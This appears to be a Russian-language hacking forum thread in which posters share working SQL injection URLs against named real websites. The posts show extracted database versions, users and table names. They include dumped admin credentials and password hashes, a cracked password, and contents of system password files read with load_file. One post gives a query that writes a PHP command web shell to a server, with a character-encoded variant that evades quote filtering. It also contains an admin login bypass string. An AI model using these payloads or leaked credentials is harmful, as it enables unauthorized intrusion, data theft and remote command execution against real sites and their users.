SQL Инъекции

michaelyoun.com

Code:

http://michaelyoun.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/*

4.0.17-standard:michael132576:[email protected]
доступа к mysql нет

elmark.com.pl

Code:

http://www.elmark.com.pl/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*

5.0.33-log:elmarkautomatyka:elmarkautomatyka@localhost

36 таблиц:

Code:

http://www.elmark.com.pl/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+35,1/*

по названиям таблиц ни админов, ни юзеров, ни другого интересного не нашёл

 

Classifields - Универсальная бесплатная доска объявлений
http://www.classifields.ru/

Code:

http://www.classifields.ru/?field=999999999+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,version(),11,12,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*

Code:

COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
class_anekdotes
class_categories
class_links
clicker_ips_lasbber
documents
garbage_0
hotels_k
images_k
kigal_additional
kigal_backlinks
kigal_boxes
kigal_categories
kigal_pages
kigal_sites
lasbber_additional
lasbber_backlinks
lasbber_boxes
lasbber_categories
lasbber_pages
lasbber_sites
li_keywords
li_keywords_categories
links_p2
mail_answers
mail_answers_0
mail_categories
mail_questions
mail_questions_0
mail_users
markt_additional
markt_additional_temp
markt_backlinks
markt_boxes
markt_categories
markt_links
....
147 таблиц

user:catalog1@localhost
ver:5.1.16-beta
database:catalog1

прочитал: # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62acket Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64flogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6ost Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin drug:*:1001:0:User &:/usr/home/drug:/usr/local/bin/bash mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin a47001:*:1002:1002:User &:/usr/home/a47001:/usr/local/bin/bash phpmyadmin:*:1003:1003:User &:/usr/home/phpmyadmin:/usr/local/bin/bash just:*:1004:1004:User &:/usr/home/just:/usr/local/bin/bash spellen:*:1005:1005:User &:/usr/home/spellen:/usr/local/bin/bash hedgehog:*:1006:1006:User &:/usr/home/hedgehog:/usr/local/bin/bash a47002:*:1007:1007:User &:/home/a47002:/bin/sh a47003:*:1008:1008:User &:/home/a47003:/bin/sh

 

gamerslogik.com

Code:

http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),version(),database(),user()),4,5,6,7,8+--+

5.0.24a-standard-log:gl_main:[email protected]

Code:

http://www.gamerslogik.com/preview.php?PrevID=-29+union+select+1,2,concat_ws(char(58),username,user_password,user_icq),4,5,6,7,8+from+phpbb_users+limit+2,1+--+

Admin:
prfectjon:0f80a358117986ddb519d30b4b6c0993:lockhart
http://gamerslogik.com/phpbb2/

 

[talant.biz]
http://talant.biz/admin/about_vacancy.php?edit_vac=-36+union+select+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3A,VERSION(),USER(),DATABASE()),0x71),0x71),3,4,5/*

4.1.11-Debian_4sarge2-log:[email protected]:stdimensiy_tal3

при входе в админку
admin' or 1=1/*
sdsdsd

[docs.nexter.ru]
http://docs.nexter.ru/index.php?mode=1&part_id=111
/home/webadmin/nexter.ru/html/ghost/inc/
/home/webadmin/nexter.ru/html/ghost/admin/inc/files.inc.php
http://docs.nexter.ru/index.php?mode=1&part_id=7+order+by+3/*
http://docs.nexter.ru/news.php?id=3+order+by+4/*
версия 3-ка :'(
http://docs.nexter.ru/news.php?id=3+and+(ascii(substring(VERSION(),1,1))=51)/*

[semi.com.ua]
/var/www/semi/semi.com.ua/whatis.php
http://www.semi.com.ua/whatis.php?ids=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7/*'
4.1.22:u_semi@localhost:semi

 

тут не обсуждаются иные темы.....

 

Специально для будущих космонавтов
5.0.26-max-logacademyacademy@localhost

Code:

http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,version(),database(),user()),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86+from+information_schema.tables+limit+0,1/*
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86+from+information_schema.columns+limit+0,1/*

4.0.25-standardiwdpiwdp@localhost

Code:

http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,version(),database(),user()),3,4,5,6,7,8,9,10,11/*
http://www.iwdp.co.uk/profile.php?id=-34+union+select+1,concat_ws(0x05,username,password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*

4.0.27inodeci000073_0001[email protected]

Code:

http://www.cisci.net/competition.php?lang=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7/*
http://www.cisci.net/user_info.php?lang=-1%20union%20select%201,2,3,concat_ws(0x05,user_name,password,email),5,6,7%20from%20user/*

4.0.27-standard-logdb206415585[email protected]

Code:

http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/*
http://restaurantway.com/index.php?smode=rest&type=1&parent=index&rest_id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x05,id,username,password,email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+t_user/*

 

rokos.ru - инет-магазин

Code:

http://www.rokos.ru/product/suite_furniture/suite_98.html?template=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/*

4.0.27-standard:rokosru_netcat:rokosru_netcat@localhost

nca.ru - концертное агенство

Code:

http://www.nca.ru/rus_concert.php?itemid=-1+union+select+1,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

4.1.11-Debian_4sarge5-log:t9700970_nca1:[email protected]
Увы, но доступ к mysql прикрыт

 

а можно как-нить файл залить, если кавычка фильтруется?

 

eurogarden.ro

Code:

http://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/*

5.0.24a-standard-log:eurogarden:[email protected]

18 таблиц:

Code:

http://www.eurogarden.ro/categorie.php?itemid=-1+union+select+1,2,3,4,5,table_name,7+from+information_schema.tables+limit+17,1/*

интересных - нет.

books.bg

Code:

http://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*

5.0.38-Ubuntu_0ubuntu1.1:books2:books2@localhost

139 таблиц:

Code:

http://www.books.bg/ItemBought.php?shop=-1+union+select+1,table_name+from+information_schema.tables+limit+138,1/*

Интересные таблицы:

Code:

phpbb_users
users
users_login

root:

Code:

http://www.books.bg/ItemBought.php?shop=-1+union+select+1,concat_ws(0x3a,col_user_name,col_password)+from+users_login+limit+0,1/*

"логин:пасс" : idenev:UIB7jqkj

 

вот по сути запрос заливки шелла в вашем случае...

Code:

http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*

так будет выглядить запрос для обхода фильтрации

Code:

http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*

P.S существует удобный плагин для таких дел HackBar (Firefox)...

 

http://www.it-rex.ru/ftpgetfile.php?id=69'
Как раскрутить - не знаю...
http://www.it-rex.ru/ftpgetfile.php?id=69' union select null,pass from user where name ='admin
так ошибка не вылетает, но и данных нет

 

_www.dancor.sumy.ua

Code:

_http://www.dancor.sumy.ua/ads.php?archive=0&rubric_id=-123/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/*

_www.shopcdn.ca (ShopCANADIAN)
Смотрим версию мускула, пользователя, базу:

Code:

_http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4/*

5.0.22-community-max-nt:[email protected]:shopcdn
Повезло: версия=>5
Смотрим таблицы, меняя лимит:

Code:

http://www.shopcdn.ca/searchresult.php?sbcat_id=-1+union+select+1,table_name,3,4+from+information_schema.tables+limit+1,1/*

40 таблиц

 

Code:

_http://www.it-rex.ru/ftpgetfile.php?id=69'+union+select+1,2/*

При таком запросе предлагается файл boot98se.exe на скачку

 

Code:

http://www.admedicine.org/news.php?id=-278+union+select+1,2,concat_ws(0x2F,user(),version(),database()),4,5/*

u_admedicine@localhost/4.1.22/admedicine

 

http://www.sibdosug.com/

Code:

http://www.sibdosug.com/type.php?type=-4+union+select+concat(username,char(58),password)+from+phorum_users+where+admin=1/*

Версия: 4.1.22
Юзверь: [email protected]

Code:

http://www.sibirdosug.com/phorum/admin.php

-
admin:9da3bd1c75d51cc5da6a4fa573e269cd:slec700
Сенькс фор брутед хэш ту Iceangel_ =)

http://www.shark.ru/

Code:

http://www.shark.ru/catalog.php?rid=-37+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*

Version: 4.0.22-standard
User: root@localhost
Также можно прочитать: /etc/hosts, /etc/services, /etc/group, /etc/profile, /etc/bashrc, /etc/skel/.bashrc, /etc/php.ini, /etc/httpd/conf/httpd.conf

http://www.b-connect.ru/

Code:

http://www.b-connect.ru/view.php?id=-1155'+union+select+1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

Version: 4.0.26-log
User: Uwww3901S@localhost

http://www.rapida.ru/

Code:

http://www.rapida.ru/news.php?id=-22'+union+select+1,2,aes_decrypt(aes_encrypt(concat(version(),0x3a,user()),0x71),0x71),4+from+news/*

Version: 4.1.14
User: [email protected]

http://www.strasty.ru/

Code:

http://www.strasty.ru/disk.php?id=-996+union+select+1,2,3,concat(version(),char(58),user()),5/*

Version: 4.1.20-log
User: a2856_strasty@localhost

 

Code:

http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-log
admin@localhost
eGeniusSystem

Названия таблиц подобрать не смог...(

 

Это то что нашел...

Code:

http://www.huntingdon-free-church.org.uk/index.php?pageid=-112+union+select+1,2,concat_ws(0x05,id,pagename,pagetitle),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+pages/*

 

Code:

http://[COLOR=DarkOrchid]www.kimkimdir.gen.tr[/COLOR]/kimkimdir.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

5.0.26-log [email protected]

Code:

http://[COLOR=DarkOrchid]skoool.meb.gov.tr[/COLOR]/keystage3.aspx?id=1+or+1=@@version

'Microsoft SQL Server 2000

Code:

http://[COLOR=DarkOrchid]skoool.meb.gov.tr[/COLOR]/keystage3.aspx?id=1+or+1=(select+top+1+table_name+from+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+('content_history','ad_mapping_tbl','app_messages','approval_status_tbl','approval_tbl','calendar_event_tbl','calendar_tbl','cms_content_types','config_tbl','content','content__','content_edit','content_folder_tbl','content_index','content_index_new','content_meta_tbl','content3','dtproperties','edit_meta_tbl','folder_to_template_tbl','fonts','form_tbl','history_meta_tbl','history_xml_tbl','language_type','library','library_folder_tbl','libtype','load_balance_tbl','max_entries','metadata_type','module_licenses','nav_tbl','nav_to_content_tbl','permissions_tbl','save_meta_tbl','save_tbl','settings','sysconstraints','syssegments','tbl_bettData','templates_tbl','user_to_group_tbl','usergroups','users','xml_collection_tbl','xml_to_item_tbl'))

Code:

http://[COLOR=DarkOrchid]www.dusunenadam.com.tr[/COLOR]/koseyazilari.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6/*

4.1.1-alpha-max

Code:

http://[COLOR=DarkOrchid]www.harlemstage.org[/COLOR]/SEASON/index.php?id=-1+union+select+1,2,3,4,version(),6/*

4.1.20-log

Code:

http://[COLOR=DarkOrchid]www.stagenoise.com[/COLOR]/stagecast/episode.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9/*

4.0.27-max-log

 

Code:

http://www.roguegovernment.com/news.php?id=-2169+union+select+1,concat_ws(0x2F,user,password),3,4,5,6+from+mysql.user/*

root : 6aee13f5467031e6

 

Таблицу подобрать несмог.

Code:

http://www.mts-press.ru/links.php?part_id=-9+union+select+database()/*

mts_pressru
4.0.26
[email protected]